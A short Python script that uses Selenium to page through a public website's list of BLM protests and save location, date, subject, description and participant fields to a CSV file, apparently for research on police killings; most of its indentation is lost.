#To run the python script, type the following line into the command prompt:
#python "C:\Users\travi\Dropbox\Police Killings\Do Files\webscrape.py"
# import packages
import time
import itertools
import csv
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from time import sleep
# access website through automated chrome
chrome_path=r"C:\Users\travi\Anaconda3\Lib\site-packages\selenium\chromedriver.exe"
driver = webdriver.Chrome(chrome_path)
driver.get('https://elephrame.com/textbook/BLM')
sleep(2)
# save csv
filename = "../Data/BLM Protests/protests_scrape.csv"
f = codecs.open(filename, encoding='utf-8', mode='w+')
headers = "Location, Date, Subject, Description, Participants\n"
f.write(headers)
# loop clicks over all pages
page_new = 1
pagenum = -1
while(pagenum < page_new):
#click to next page
if pagenum > -1:
driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[4]""").click()
# don't overflow website
sleep(2)
#update page numbers for while statement
page_new = driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[3]/input""").get_attribute("value")
    page_new = int(page_new, 10) #converts from string to numeric
pagenum = pagenum + 1
# append data from this click
locations = driver.find_elements_by_class_name("item-protest-location")
dates = driver.find_elements_by_class_name("protest-start")
participants = driver.find_elements_by_class_name("item-protest-participants")
descriptions = driver.find_elements_by_class_name("item-protest-description")
subjects = driver.find_elements_by_class_name("item-protest-subject")
for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):
print(a.text, b.text, c.text, d.text, e.text)
f.write(a.text.replace(",", "|") + "," + b.text.replace(",", "|") + "," + c.text.replace(",", "|").replace("Subject(s): ","") + "," + d.text.replace(",", "|").replace("Description: ","") + "," + e.text + "\n")
# close browser
driver.quit()
# close csv file
f.close() | 3.71875 | 4 |